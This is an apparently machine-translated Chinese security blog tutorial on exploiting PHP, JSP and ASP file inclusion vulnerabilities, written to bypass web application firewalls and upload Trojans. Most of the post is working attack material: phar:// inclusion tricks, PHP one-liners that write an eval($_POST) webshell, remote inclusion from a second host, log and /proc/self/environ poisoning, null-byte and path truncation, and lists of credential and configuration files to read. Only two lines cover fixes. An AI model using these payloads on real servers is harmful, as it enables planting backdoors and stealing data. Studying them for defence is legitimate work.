file contains vulnerabilities (bypass gesture)

Who will burn the smoke and distract it?

The file contains the vulnerability, which is a vulnerabilities used in the penetration test process. It is mainly used to bypass the waf to upload Trojan files. Today, when I was browsing the Tools forum, I found a new type of file containing gestures, sharing it here, and attaching some files containing the basic usage of the vulnerability.

Special posture

Using the phar:// protocol feature can help us bypass some waf detection during the infiltration process. The phar:// data stream wrapper has been effective since PHP 5.3.0, and it seems to bypass the security dog.

Utilization process

New shell.php code content:

1
2
3
<?php
include 'phar://test.rar/test.txt';
?>

Create a new test.txt content:

1
2
3
<?php
phpinfo();
?>

Compress the test.txt file, you can rename the compressed file to zip, phar, rar and other formats. After accessing the shell.php file, the phpinfo content will appear.

Pro test effective

In the experimental environment, create a new shell.php, test.txt in the test directory, and package test.txt into test.zip.

The contents of shell.php are as follows:

The contents of test.txt are as follows:

Visit shell.php:

Reference: http://bbs.pediy.com/thread-216191.htm

php file contains vulnerabilities

The files in PHP contain a function that is divided into local include and remote include, causing the file to contain the following:

  • include()
  • include_once()
  • require()
  • require_once()
  • fopen()
  • readfile()
    ……

Local Containment Vulnerability (LFI)

Create a new phpinfo.txt, then create a new shell.php and write:

1
2
3
<?php
Include("phpinfo.txt");
?>

Accessing shell.php will output the contents of the phpinfo page. No matter what the extension is changed to, it will be executed in PHP code. If the file does not conform to the php rules (ie, no <?php?>, etc.), the source code can be directly exported by include.

Remote Contains Vulnerabilities

Prerequisite: You need to enable allow_url_fopen, which is disabled by default.
Create a new php.txt:

1
2
3
<?php
echo "hello world";
?>

Create new index.php:

1
2
3
<?php
Include($_GET['page']);
?>

Visiting http://www.xxxx.com/page=http://www.xxxx.com/php.txt will output hello world.

File contains exploits

Reading sensitive information

Such as: http://www.xxx.com/index.php?page=/etc/passwd
Windows:

1
2
3
4
5
c: \ boot.ini
c:\windows\systems32\inetsrv\MetaBase.xml
c:\windows\repair\sam
c:\windows\php.ini php configuration file
c:\windows\my.ini mysql configuration file

LINUX:

1
2
3
4
5
/etc/passwd
/usr/local/app/apache2/conf/http.conf
/usr/local/app/php5/lib/php.ini PHP related settings
/etc/httpd/conf/http.conf apache configuration file
/etc/my.cnf mysql configuration file

Remote contain shell

The test.txt file can be saved on the remote server as follows:

1
<?fputs(fopen("shell.php","w"),"<?php eval($_POST[nmask]);?>")?>

If the target site has remote inclusion vulnerabilities, you can access it by visiting: http://www.xxx1.com/index.php?page=http://www.xx2.com/test.txt at the server root directory The production of a shell.php content is:

1
<?php eval($_POST[nmask]);?>

Locally included with file upload

If the target server has the allow_url_fopen turned off, you can try to use the local include + file upload
Upload a picture Trojan a.jpg with the content:

1
<?fputs(fopen("shell.php","w"),"<?php eval($_POST[tzc]);?>")?>

Visit the URL: http://www.xxx.com/index.php?page=./a.jpg to generate shell.php locally.

Locally included with apache log to take the shell

The apache log is divided into access.log and error.log. When we request a url address, it will be recorded in the access.log, but if we access a page that does not exist, it will be written to the access.log. For example, if you visit the URL: http://www.xxx.com/<?php eval([$_POST]);?>, a sentence will be written to the access.log, but in general, write to A sentence in the access.log file is encoded, so you need to bypass the packet, and you need to know the address of the access.log to exploit this vulnerability, otherwise it will not.

Using /proc/self/environ for inclusion

Such as: http://www.test.com/view.php?page=../../../../proc/self/environ
This is the environment variable when the web process is running. Some of the parameters are user-controllable. The most common method is to insert a sentence in the User-Agent.

Using the php protocol for inclusion
  • data: php5.2 and later versions
  • php://input needs to enable allow_url_include

little:

1
http://www.test.com/index.php?file=data:text/plain,<?php phpinfo();?>%00

Truncation contains

Some developers write code to prevent local inclusion of vulnerabilities:

1
2
3
<?php
Include $_GET['page'].".php"
?>

(a) 00 truncation contains
New 1.jpg:

1
<?fputs(fopen("shell.php","w"),"<?php eval($_POST[tzc]);?>")?>

In this case, for example, uploading a 1.jpg image code, when accessing http://www.xxx.com/1.jpg, the access is 1.jgp.php, thinking that there is no such file, so an error is reported. This is, you can try to visit http://www.xxx.com/1.jpg%00

(two) use long directory truncation

1
2
3
4
5
././././././././././././././etc/passwd
or
////////////////////////////etc/passwd
or
../a/etc/passwd/../in/etc/passwd/../in/etc/passwd

In Windows, the maximum length of the directory is 256 bytes, and under linux is 4096 bytes, and the excess part is discarded.

File contains bug fixes

Open the open_basedir function and set it to the specified directory, only the files in that directory are allowed to be accessed.
Close the allow_url_include function to prevent remote files from being included.

jsp file contains vulnerabilities

include

1
2
3
<%@ include file="head.jsp"%>
<%@ include file="body.jsp"%>
<%@ include file="tail.jsp"%>

jsp:include

1
2
<jsp:include page="head.jsp"/>
<jsp:include page="body.jsp"/>

Using JSTL

1
<c:import url="http://thief.one/1.jsp">

Description

(1) The include directive inserts the source code of “Header.jsp” during conversion, and the standard action inserts a response of “Header.jsp” at runtime. The element allows you to include dynamic files and statics, while the include description tag simply adds a file content as a static append to the main file.
(2) The first two methods can only contain the interface of the current web application, but c:import can contain content outside the container.

asp file contains vulnerabilities

Asp seems to be unable to contain remote files (iis security settings), can only contain local files, the syntax is as follows:

1
<!--#include file="1.asp" -->

aspx file contains vulnerabilities

The aspx file contains the same syntax as ASP, and the syntax is as follows:

1
<!--#include file="top.aspx" -->

Portal

[File upload vulnerability (bypass gesture)] (http://thief.one/2016/09/22/%E4%B8%8A%E4%BC%A0%E6%9C%A8%E9%A9%AC% E5%A7%BF%E5%8A%BF%E6%B1%87%E6%80%BB-%E6%AC%A2%E8%BF%8E%E8%A1%A5%E5%85%85/)

本文标题:file contains vulnerabilities (bypass gesture)

文章作者:nmask

发布时间:2017年04月10日 - 14:04

最后更新:2019年07月11日 - 15:07

原始链接:https://thief.one/2017/04/10/02/en/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

nmask wechat
欢迎您扫一扫上面的微信公众号,订阅我的博客!
坚持原创技术分享,您的支持将鼓励我继续创作!

热门文章推荐: